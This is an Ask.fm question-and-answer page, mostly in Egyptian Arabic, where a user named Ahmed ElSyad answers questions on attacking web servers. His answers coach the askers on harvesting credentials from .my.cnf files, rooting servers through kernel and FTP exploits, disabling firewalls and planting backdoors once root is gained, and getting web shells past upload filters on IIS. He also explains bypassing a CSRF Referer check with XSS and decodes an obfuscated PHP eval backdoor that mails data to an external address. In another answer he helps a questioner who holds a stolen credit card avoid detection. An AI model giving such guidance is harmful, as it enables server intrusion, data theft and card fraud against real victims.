@ElSyad

Ahmed ElSyad

Ask me anything Follow
Ask @ElSyad

Sort by:

LatestTop

Previous

اصيااد .. هو انا لما اخترق السيرفر بعرف اخترق كل المواقع اللعليه ... بس انا عشان اجيب سيرفر لازم اجيب موقع مصاب واستغله وارفع سكربت اتصال بقاعده البيانات واسكربت استخراج الكونفيج مفيش طريقة اجيب بيها السيرفر ع طول لو ينفع ممكن تفهمنى ازاى ؟؟

ممكن تخترق السيرفر كله وممكن لا ده على حسب حماية السيرفر
عشان تجيب اى سيرفر ممكن تجيب اكسس على اى موقع عليه وبعدها اما تسحب اختصار للجذر او تتصل عكسى وتحاول ترفع صلاحياتك لروت باى طريقة من المعروفين
ممكن كمان بدل ده كله تستهدف السيرفر نفسه بس دى الافضل لو كان السيرفر خاص تستخدمها
هيا انك تستخرج الخدمات والبورتات المفتوحة وتعرف البرامج اللى شغالة وتشوف ليها ثغرات
والطرق المتقدمة دى

لو سمحت يا احمد .. فيه طريقة اقدر اسحب Cpanel من السيرفر ؟؟

فى كذا طريقة
ممكن تعمل عملية خداع للضحية
ممكن تدور على الملف .my.cnf اللى بيكون على المسار
/home/user/
بيكون فى مجلد اليوزر اذا كان موجود جرب البيانات بتاعته احتمال كبير تخش معاك
للعلم بس ده ملف بيتم انشائه عند اول سكربت بيتم انشائه
وطرق تانية
1
Liked by: Xorer

People you may like

HessienMohamed901’s Profile Photo Hussain Mohamed
also likes
Mido9695’s Profile Photo Mahmed Y Ahmed
also likes
abdokhaled5’s Profile Photo Abdelrahman | Hacker
also likes
Abdallah_Hashem1296’s Profile Photo Abdallah Hashem
also likes
faisal_fathe’s Profile Photo Faisal Fathe
also likes
Want to make more friends? Try this: Tell us what you like and find people with the same interests. Try this:
#movies #electronicmusic #food #pop #fun #party #sport #comics #basketball
+ add more interests + add your interests

ههههههههههه يا عم احمد متقلقش مش هكلمك كتير يعني بس لو مش عايز براحتك قشطة

مش حكاية كلام او حاجة طالما فى اسئلة يبقى هنا عشان غيرك يستفيد :*
1
Liked by: Xorer

ممكن تديني رقم تليفونك عشان عايز اسالك في حاجة لو ممكن

ممكن تسالنى هنا

احمد مرحبا ، هلا انا معي فيزا مسروقةة في مواقع ممكن أشتري منها دومين بدون ما يعرف صاحب الفيزا أو بدون ما تعلق الاستضافة حسابي وتطلب صورة للبطاقة ومعلومات البيلينج تبع الفيزا ؟

حكاية انه يعرف دى افتكر على حسب البنك لان فى بنوك بتبعت رسالة لصاحب الفيزا عشان يعرف انه اتسحب منه كام
وفى منهم اللى بيتصل لو كان المبلغ عالى جدا
لو عاوز دومين جاهز ي عمى خد دومين انا كنت عمله مدونة
arab-blog.net
محجوز 3 سنين يعنى براحتك
ممكن تغير البيانات لو عاوز مش مشكلة انا مش محتاجه
كلمنى على الفيس بتاعى لو حابب
1
Liked by: I B R A H I M

لو سمحت بدي اكبر قدر ممكن من انواع الثغرات (ممكن الثغرات المتعلقة بال form يعني user name & password )واخطرها وكيف يمكن حلها اذا ممكن

Sql Injections بانواعها
Auth Bypass
Xss بانوعها زى Html Injection وغيرها
انا نزلت درس بخصوص الاخيرة دى هتلاقى على جروب
https://www.facebook.com/groups/information.securit/
دول المشهورين جدا او المنتشرين جدا

السلام عليكم شوفي افكار لحماية مراكز الرفع اخي ؟ وحماية صفحة اللوغ ان وحماية صفحة كتابة المواضيع من جميع النواحي

وعليكم السلام
الافكار كتيرة والدوال اكتر للحماية وفى منها اللى يمكن تخطيه وفى اللى متقدرش تتخطاه
يعنى مثلا ممكن تعمل Size او حجم معين للملف اللى يترفع
طبعا مع وضع تحقق من صيغة الملف زى مثلا الدالة in_array
التحقق من محتوى الملف وطبعا ملف الهاتكس بيلعب دور كبير جدا فى الحماية زى ما بيعمل فى الاختراق
الطرق كتيرة جدا ومش هقدر الخصهالك فى مشاركة واحدة
لو دورت بجوجل هتلاقى طرق كتيييرة جدا

slm khoya HMED NEW METHOD CONFIG AND TOOLS IF YOU CAN DO THAT BRO

وعليكم السلام
بخصوص سحب الكونفجات بقى صعب الايام دى لان الاغلبية من السيرفرات بقت تغيير المسارات الافتراضية
بالشكل ده بيكون خطوة بسيطة وفى نفس الوقت كويسة جدا للتصدى لعمليات سحب الكونفجات
اما اذا كان قصدك بخصوص عمل اختصار للجذر
فده يا صديقى انصحك انك تعمله يدوى لان امر انشاء الاختصار فى الاغلبية دلوقتى بقوا يمنعوه
او انه مش موجود ضمن صلاحياتك فى مترجم الباش
بالتالى انصحك انك تختصر الجذر للسيرفر يدوى ولان كمان فى مشكلة بتواجه ناس لما بتطبق الامر
بخصوص الادوات اللى هيفرق معاك اكتر حاجة (محتوى) ملف الهاتكس
ده فى الاغلب لانه اغلب التخطيات بتكون من خلاله سيبك من الاوامر والاوبشنز اللى بقت معروفة دى
انما اللى يعرف يتعامل مع الملف ده هيعرف ازاى يخرب الدنيا من خلاله
موفق .

السلام عليكم اخي احمد ، لما احاول اﻻتصال باحد المواقع تجيني هده الرسالة Error 522 Ray ID: UTC Connection timed out كيف يمكنني تخطيها شكرا

Said Elbal
ممكن تبقى المشكلة من الكوكيز او الملفات المؤقتة بتاعتك
جرب تنظف الجهاز ويفضل انه يكون يومياً
استخدم برنامج Ccleaner ممتاز جدا
او يمكن السيرفر فيه مشكلة او Load زيادة عليه
عشان تتاكد انه شغال عند الكل والحمل عليه مش كتير
http://www.isitdownrightnow.com
من الموقع ده حط رابط الدومين وشوف هيديك ايه اذا اداك UP وعلامة خضرا جنبها يبقى شغال تمام
اذا اداك Down وعلامة حمرا جنبها يبقى فيه مشكلة زى ما وضحت
2
Liked by: Nicole Said Elbal

السلام عليكم اخي احمد ، لما احاول اﻻتصال باحد المواقع تجيني هده الرسالة Error 522 Ray ID: UTC Connection timed out كيفم يمكنني تخطيها شكرا

ممكن تبقى المشكلة من الكوكيز او الملفات المؤقتة بتاعتك
جرب تنظف الجهاز ويفضل انه يكون يومياً
استخدم برنامج Ccleaner ممتاز جدا
او يمكن السيرفر فيه مشكلة او Load زيادة عليه
عشان تتاكد انه شغال عند الكل والحمل عليه مش كتير
http://www.isitdownrightnow.com
من الموقع ده حط رابط الدومين وشوف هيديك ايه اذا اداك UP وعلامة خضرا جنبها يبقى شغال تمام
اذا اداك Down وعلامة حمرا جنبها يبقى فيه مشكلة زى ما وضحت
1
Liked by: Said Elbal

ممكن فك التشفيرة دى eval(pack('H*','6d61696c282261796f7562616974746f746f40676d61696c2e636f6d222c247375626a6563742c245a626f6f6e2c2468656164657273293b'));

وعليكم السلام
دى تلغيمة يا برنس
الميل اهه
ayoubaittoto@gmail.com
والكود بعد الفك
mail("ayoubaittoto@gmail.com",$subject,$Zboon,$headers);
خلى بالك من استخدامك للملف اللى فيه الكود التالى
بالتوفيق

https://ask.fm/ElSyad/answers/137053120680 اخي هل طريقة ثغرة الكيرنل ناجحة ؟ يعني عندما اجد الكيرنال المناسب .. هل اضمن ترويت السيرفر؟ اقصد ربما اجد الكيرنل مرقع .. او لا توجد به ثغرة !؟ وماذا تقصد في اي برنامج من برامج السيرفر ؟

بخصوص الكيرنل ممكن يكون السيرفر مرقع الثغرة او مش مصاب بيها بالاساس
لانه عامل تحديثات للكيرنل
اما بخصوص البرامج فده معروف وبسيط برضه
تسمى بـ Remote Exploits , Privilege Escalation
ودى بتكون فى برامج بتكون مركبة على السيرفر المصاب
مثلا برنامج FTP بتدور على ثغرات ليه فى مواقع الثغرات زى مثلا على نظام لينوكس وليكن مثلا proftp
بتلاقى ليه كذا ثغرة وفى منها اللى بتحصل بيها على صلاحيات الرووت
واسف على التأخير

السلام عليكم اخي انا صاحب السؤال https://ask.fm/ElSyad/answers/137053124264 اخي انا اقصد ماذا افعل بعد الحصول على باسورد الروت ؟ حصلت عليه لكن لا اعرف ماذا افعل ؟؟ وماذا استفيد منه وكيف اتصل وعن طريق ماذا ادخل

وعليكم السلام
ممكن تجرب تتصل من برنامج Putty
او انك تجربه على لوحة تحكم السيرفر نفسه بس دى على حسب لان فيه انواع كتيرة
Whm,DirectAdmin,Paralles
وكل لوحة تحكم ليها بورتات معينة ليها
جرب لوحة الوهم الاول لان الاغلبية مركبينها
ipserver:2086
او لو السيرفر مركب SSL
ipserver:2087

السلام عليكم .. حصلت على باسورد الروت ... ماذا افعل بعد ذلك لترويت السيرفر او الوصول الى ابعد نقطة ؟

وعليكم السلام
فى الاول وقف عمل الفايروول الموجود على السيرفر
لغم السيرفر وطرق التلغيم كتيرة ومعروفة
ابحث عن دروس دورة فريق الهكر المصرى
وشوف دروس ما بعد الحصول على الرووت

مرحبا اخي كم طريقة استطيع من خلالها ترويت السيرفر ؟

اهلا بيك
كتير يا غالى
طرق الحصول على صلاحيات الرووت كتيرة
ممكن من خلال ثغرة فى كرنل السيرفر
او فى اى برنامج من برامج السيرفر
او من خلال الهندسة الاجتماعية
او من خلال التلغيم او التلاعب على الداتا سنتر نفسها وغيرها

السلام عليكم انا كنت بحاول ارفع شيل من fckeditor browser بس السيرفر بيرفض يستعرضه من ان الشيل بيبقى موجود في قايمة الـfiles وجربت اكتر من صيغه زي cer وjsp و aspx مفيش طريقة اتخطى بيها الـforbidden ده هو السيرفر نوعه microsoft iis وشكرا

وعليكم السلام
جرب تشفر الشل
او جرب ترفع مركز رفع صغير ويكون مشفر بكذا تشفيرة
او انك تشفره بالزند ودى لو كان الزند موجود على السيرفر
او انك ترفع بامتداد phtml,php5 الى ما اخره
او انك تلعب فى المسار ودى من خلال التعديل على الطلب (Request)

Hi ! yes no csrf tokenz but they used checking the Referer so i try to test my csrf attack but failed ? so any hints with XSS ? thaanks!

Hi bro
Okay, there is many methods to bypass this
ex:
You can use XSS redirect payload to spoof the Referer
Or you can Google it for more methods.

Hi bro ! Any idea About ByPassing CSRF Referer with XSS ? thaanks : ))

Hey bro
Is there any CSRF tokens ?
If no, we can use many methods to bypass it through Xss payloads.

Next

Language: English

4.1

1,266,418 reviews
© Ask.fm 2024